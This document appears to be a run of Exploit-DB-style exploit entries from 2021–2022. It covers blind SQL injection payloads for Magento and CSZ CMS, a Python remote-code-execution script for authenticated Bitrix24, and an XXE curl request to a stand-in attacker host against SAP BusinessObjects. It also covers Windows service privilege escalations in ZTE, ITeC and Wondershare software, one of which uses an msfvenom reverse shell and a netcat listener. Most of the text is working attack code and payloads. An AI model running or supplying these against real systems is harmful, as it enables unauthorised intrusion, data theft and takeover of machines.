Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi # Date: 2021-4-21 # Exploit Author: Aydin Naserifard # Vendor Homepage: https://www.adobe.com/ # Software Link: https://github.com/magento/magento2/releases/tag/2.3.5-p2 # Version: [2.3.5-p2] # Tested on: [2.3.5-p2] POC: 1)PUT /rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23 2)POST /cargo/index/validateqty [quote_id parameter] quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23

# Exploit Title: Bookeen Notea - Directory Traversal # Date: December 2021 # Exploit Author: Clement MAILLIOUX # Vendor Homepage: https://bookeen.com/ # Software Link: N/A # Version: BK_R_1.0.5_20210608 # Tested on: Bookeen Notea (Android 8.1) # CVE : CVE 2021-45783 # The affected version of the Bookeen Notea System Update is prone to directory traversal vulnerability related to its note Export function. # The vulnerability can be triggered like so : # - Create a note or use an existing note on the device # - rename this note ../../../../../../ # - keep touching the note until a menu appears # - touch to select "export" # - touch "View" # Now you can access and explore the device filesystem.

# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated) # Date: 4/22/2022 # Exploit Author: picaro_o # Vendor Homepage: https://www.bitrix24.com/apps/desktop.php # Tested on: Linux os #/usr/bin/env python #Created by heinjame import requests import re from bs4 import BeautifulSoup import argparse,sys user_agent = {'User-agent': 'HeinJame'} parser = argparse.ArgumentParser() parser.add_argument("host", help="Betrix URL") parser.add_argument("uname", help="Bitrix Username") parser.add_argument("pass", help="Bitrix Password") pargs = parser.parse_args() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] inputcmd = input(">>") s = requests.Session() def login(): postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password} r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata) def getsessionid(): sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en", headers = user_agent) session = re.search(r"'bitrix_sessid':.*", sessionid.text) extract = session.group(0).split(":") realdata = extract[1].strip(" ") realdata = realdata.replace("'","") realdata = realdata.replace(",","") return realdata # print(r.text) def cmdline(cmd,sessionid): cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'} usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers = user_agent, data = cmdline) soup = BeautifulSoup(usercmd.content,'html.parser') cmd = soup.find('p').getText() print(cmd.rstrip()) login() sessionid = getsessionid() while inputcmd != "exit": cmdline(inputcmd,sessionid) inputcmd = input(">>")

# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi # Date: 2021-04-22 # Exploit Author: Dogukan Dincer # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download # Version: 1.3.0 # Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4 # Discovery of Vulnerability - First go to CSZ CMS web page - then go to http://yourhost/plugin/article directory on CMS. - To see the error-based SQLi vulnerability, the ' character is entered in the search section. - It is determined that the "p" parameter creates the vulnerability. - Databases can be accessed with manual or automated tools. # Proof of Concept http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - # Sqlmap output: Parameter: p (GET) Type: error-based Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS

# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) # Google Dork: N/A # Date: 4/21/2022 # Exploit Author: West Shepherd # Vendor Homepage: https://www.sap.com/ # Software Link: https://www.sap.com/ # Version: 4.2 and 4.3 # Tested on: Windows Server 2019 x64 # CVE : CVE-2022-28213 # References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \ --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \ https://example.com/biprws/logon/long

# Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path # Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg # Discovery Date: 2022-04-24 # Vendor Homepage: https://www.zte.com.cn/global/ # Tested Version: 2.0.3.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ UDisk Monitor Z5 Phone UDisk Monitor Z5 Phone C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe Auto C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: UDisk Monitor Z5 Phone TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : UDisk Monitor Z5 Phone DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\edgar>systeminfo Nombre de host: DESKTOP-810865D Nombre del sistema operativo: Microsoft Windows 10 Pro Versión del sistema operativo: 10.0.19044 N/D Compilación 19044

# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path # Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg # Discovery Date: 2022-04-25 # Vendor Homepage: https://itec.es/programas/ # Vulnerability Type: Unquoted Service Path Privilege Escalation # Tested on OS: Microsoft Windows 11 Home To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. C:\Users\edgar>sc qc "ITeCProteccioAppServer" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ITeCProteccioAppServer TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : ITeCProteccioAppServer DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\edgar>systeminfo Nombre de host: DESKTOP-0DL5SID Nombre del sistema operativo: Microsoft Windows 11 Home Versión del sistema operativo: 10.0.22000 N/D Compilación 22000

# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions # Date: 04/25/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://drfone.wondershare.com/ # Software Link: https://download.wondershare.com/drfone_full3360.exe # Version: 11.4.10 # Tested on: Windows 10 64-bit # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website) # Description: The application "Wondershare Dr. Fone" comes with 3 services: 1. DFWSIDService 2. ElevationService 3. Wondershare InstallAssist All the folders that contain the binaries for the services have weak permissions. These weak permissions allow any authenticated user to get SYSTEM privileges. First, we need to check if services are running using the following command: wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running Now we need to check if we have enough privileges to replace the binaries: icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone" Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit) ... icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps" Everyone:(I)(OI)(CI)(F) <= same here ... icacls "C:\ProgramData\Wondershare\Service" Everyone:(I)(OI)(CI)(F) <= and here ... # Proof of Concept: 1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") 2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\) 3. After replacing the binary, wait the next reboot (unless the service can be restarted manually) As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener: simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe listener: nc -nlvp <YOUR_PORT>